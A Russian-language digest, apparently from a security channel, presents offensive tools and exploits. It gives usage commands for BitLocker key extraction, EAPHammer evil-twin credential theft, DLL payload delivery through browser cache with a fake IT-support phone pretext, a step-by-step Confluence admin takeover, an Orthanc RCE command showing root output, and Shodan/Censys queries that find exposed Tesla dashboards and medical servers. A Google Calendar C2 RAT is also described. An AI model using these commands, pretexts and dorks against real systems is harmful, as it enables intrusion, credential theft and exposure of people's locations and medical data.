https://github.com/p0dalirius/ExtractBitlockerKeys

Скрипт для автоматического извлечения ключей восстановления BitLocker из домена.

Возможности:
— Получение списка всех компьютеров с помощью LDAP.
— Итерация по полученным данным с использованием многопоточности.
— Экспорт результатов в JSON/XLSX/SQLITE3 с полными именами компьютеров, доменом, идентификаторами томов и ключами восстановления

Пример использования

./ExtractBitlockerKeys.py -d 'domain.local' -u 'Administrator' -p 'Podalirius123!' --dc-ip 192.168.1.101

Использовать при постэксплуатации для восстановления зашифрованных данных.

https://github.com/guibacellar/TEx

TEx — это инструмент, созданный для помощи исследователям, следователям и представителям правоохранительных органов в сборе и обработке огромного количества данных, генерируемых криминальными, мошенническими, и другими группами пользователей Telegram.

Возможности:
— Менеджер соединений для нескольких аккаунтов
— Парсер информации о группах и их пользователях
— Message Listener с дампом новые сообщения
— Генератор HTML-отчетов с экспортом файлов

Rekognition Discord Bot

Discord-бот для анализа изображений. Умеет идентифицировать предметы, распознавать эмоции, знаменитостей и извлекать текст.

Использует API AWS Rekognition. Разработчик поднял собственный инстанс на сервере The Pirates' Plunder, который можно использовать бесплатно.

Кроме того, там есть и другие боты:
— Hashcat Bot - использует hashcat со словарями RockYou и Crackstation, чтобы взламывать пароли
— Shodan Bot - хакерский поисковик для поиска информации о сервисах, устройствах и уязвимостях
— DarkWeb Bot - ищет запросы в даркнете и возвращает ссылки со скриншотами результатов с помощью ahmia.fi.
— Email OSINT Bot - проверка электронной почты на наличие связанных аккаунтов в социальных сетях и слитых паролей
— Watson Bot - поиск по никнейму в различных сервисах для проверки на существование аккаунта

https://github.com/s0lst1c3/eaphammer

EAPHammer — это набор инструментов для проведения целевых атак "злой двойник" на сети WPA2-Enterprise. Предназначен для использования Red Team при проведении пентестов беспроводных сетей.

Возможности:
— Кража учетных данных RADIUS из сетей WPA-EAP и WPA2-EAP.
— Выполнение атак c использованием Hostile Portal для кражи учетных данных AD
— Выполнение атак с использованием Captive Portal
— Встроенная интеграция с Responder
— Поддержка открытых сетей и WPA-EAP/WPA2-EAP
— Поддержка SSID cloaking
— Быстрые и автоматизированные PMKID-атаки на PSK-сети с использованием hcxtools

Установка:

git clone https://github.com/s0lst1c3/eaphammer.git
cd ./eaphammer
./kali-setup

Пример использования:

eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

https://sensepost.com/blog/2023/browsers-cache-smuggling/

Я использую социальную инженерию, чтобы заставить сотрудников запустить мой код и получить доступ к их системе.

Я звоню им и говорю, что я из ИТ-поддержки, прошу перейти на "официальный" сайт с PowerShell-скриптом, который им нужно запустить, чтобы решить какую-то выдуманную проблему.

Но EDR блокируют подозрительные скрипты, поэтому я хотел найти более скрытный способ доставки полезной нагрузки целевым пользователям.

Простая техника, чтобы доставить вредонос на машину цели, не заставляя ее ничего скачивать. Суть в том, чтобы отдать DLL с пейлоадом из msfvenom как изображение, и заставить браузер его закэшировать. А дальше развить атаку, используя комбинацию из DLL Hijacking в связке с социальной инженерией.

Конфиг Nginx:

location /calc.dll {
  types { } default_type image/jpeg;
  add_header Tag DLLHERE;
}

Найти файл с тегом в кэше:

Select-String "DLLHERE" *

https://github.com/vchan-in/CVE-2023-35078-Exploit-POC

Remote Unauth API Access in MobileIron Core (CVE-2023-35078)

Mobile Device Management системы привлекательны для злоумышленников, так как их компрометация обеспечивает доступ к тысячам мобильных устройств.

CISA и NCSC-NO предупреждают о возможности широкого использования уязвимостей Ivanti в сетях государственного и частного секторов.

Пример использования:
python cve_2023_35078_poc.py -u http://
python cve_2023_35078_poc.py -f urls.txt

https://github.com/godaddy/tartufo

tartufo — это утилита, которая сканирует репозитории в поисках случайно оставленных токенов и учетных данных.

Она проверяет всю историю коммитов каждой существующей ветки и ищет секреты, используя регулярки и проверяя энтропию.

Установка:
pip install tartufo

Сканировать удаленный репозиторий:
tartufo scan-remote-repo git@github.com:my_user/my_repo.git

Локальный:
tartufo scan-local-repo /path/to/your/git/repo

https://github.com/blasty/unwyze

Wyze Cam v3 RCE Exploit

Я исследовал прошивку Wyze Cam V3 в рамках участия в Pwn2Own Toronto и нашел несколько критических уязвимостей. После того, как я написал эксплоит и собирался вылетать на конференцию, я узнал, что компания Wyze выпустила обновление прошивки.

Эксплоит комбинирует две уязвимости:
1. Обход аутентификации DTLS в демоне iCamera
2. Переполнение буфера стека при парсинге json
и позволяет получить шелл, зная IP камеры.

Уязвимые версии: 4.36.10.4054, 4.36.11.4679 и 4.36.11.5859

https://github.com/cosad3s/postleaks

postleaks — это сканер воркспейсов Postman, который умеет находить конфиденциальное в общедоступном.

Postman позволяет делиться шаблонами запросов к API и объединять их в воркспейсы. Разработчики часто забывают в них недокументированные эндпоинты и учетные данные.

Установка:

pip3 install postleaks

Использование:

postleaks -k <ключевое слово> (домен/компания)

https://github.com/pentagridsec/archive_pwn

archive pwn — это утилита на Python для создания zip-, tar- и cpio-архивов, которые эксплуатирует Zip Slip уязвимости.

Благодаря таким архивам, файлы можно распаковать в произвольное место на системе. В комбинации с другими уязвимостями, приводит к полной компрометации системы.

https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off-4e5

Сравнение утилит для поиска поддоменов. Запуск "из коробки" на сайте популярной авиакомпании с широким скоупом Delta Airlines и авиакомпании поменьше — Spirit Airlines.

Нашел больше всего поддоменов — BBOT.
Самые быстрые — Subfinder и Findomain.
Поощрительный приз — theHarvester.

Примечательно, что статью написала компания, чей сканер занял первое место. Количество результатов объясняют использованием API subdomain.center от неизвестной Pwning Syndicate, которое генерирует поддомены с помощью ML.

Пока не вчитывался в новую CVE-2023-22518 10/10, но знаю о CVE-2023-22515 и думаю, что они похожи.

То, почему она стала возможна, заключается в особенностях маршрутизации внутри фреймворка, который использует Confluence.

А работает он на базе Apache Struts, который, в свою очередь, использует XWork.

Это важно, потому что особенность XWork позволяет определять действия "Action" в виде Java-классов. Открываем страницу http://<confluence>/login.action, у приложения вызывается метод "execute" класса "Login".

А еще XWork умеет взаимодействовать с геттерами и сеттерами с помощью CGI-параметров. Добавим к прошлому URL ?Id=123 и вызовем setId("123") из уже знакомого Login.

У Login есть метод, который возвращает объект BootstrapStatusProvider, мы тоже можем его вызвать. А тот, в свою очередь, расширяет ActionSupport и наследует уже все его методы.

Ну, вы поняли. Раскрутив всю цепочку из геттеров, можно дойти до самого главного класса ApplicationConfig. Он управляет конфигурацией приложения и у него, как можно было доказаться, есть сеттер setupComplete.

Если мы его переопределим, то сможем заново инициализировать приложение. Для этого достаточно отправить запрос https://<confluence>/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

А дальше открыть
https://<confluence>/setup/setupadministrator-start.action
поменять пароль админа и зайти.

Сам Confluence организует работу в куче компаний, поэтому его компрометация грозит получением доступа над всем воркспейсом сотрудников.

А эксплоит под новую CVE вы можете взять тут https://github.com/sanjai-AK47/CVE-2023-22518

https://infosecwriteups.com/how-i-hacked-1000-tesla-cars-using-osint-4cd837b8c530

Censys: "TESLAMATE" and "Dashboards" and not "sign_in"

Владельцы Tesla открывают свои админки TeslaMate без аутентификации. Там данные о машине, статистика, аналитика и все маршруты, включая дорогу до дома.

https://github.com/ShielderSec/poc/tree/main/CVE-2023-33466

Orthanc — это ПО с открытым исходным кодом для управления, обмена и визуализации данных медицинских исследований пациентов.

В версиях < 1.12.0 Orthanc подвержен уязвимости, связанной с перезаписью произвольных файлов (CVE-2023-33466), которая позволяет получить RCE в системе.

Shodan: "Orthanc Secure Area"

Пример использования:
python3 exploit.py --url "http://localhost" --config-path "/tmp/orthanc.json" --creds "orthanc:orthanc"
curl -H "Authorization: Basic $(echo -n "orthanc:orthanc" | base64)" -X POST http://localhost/tools/execute-script -d "local handle = io.popen('id'); print(handle:read('*a'))"

uid=0(root) gid=0(root) groups=0(root)

https://hackerone.com/reports/2190808

1) Перейдите по следующему URL-адресу: https://█████████.

Там вы увидите, что вошли в систему как пользователь Sys Admin. Эта роль позволяет любому пользователю загружать файлы, добавлять пользователей, изменять разрешения для пользователей и удалять пользователей.

Баг баунти Министерства обороны США 🙂

За все время сдано более 26к уязвимостей и это без вознаграждения. Не знаю, кто пишет такие сервисы (не индусы), но бюджет программы полностью окупает все ошибки.

https://github.com/MrSaighnal/GCR-Google-Calendar-RAT

Google Calendar RAT — это PoC Command&Control (C2) поверх событий Google Календаря.

Пригодится, когда сложно развернуть полноценную инфраструктуру Red Team.

Для использования GRC требуется только учетная запись Gmail. Скрипт создает «скрытый канал», используя события в Google Календаре и общаясь с целью с помощью их описания.

Недавно его использование уже было замечено в «дикой среде» https://thehackernews.com/2023/11/google-warns-of-hackers-absing-calendar.html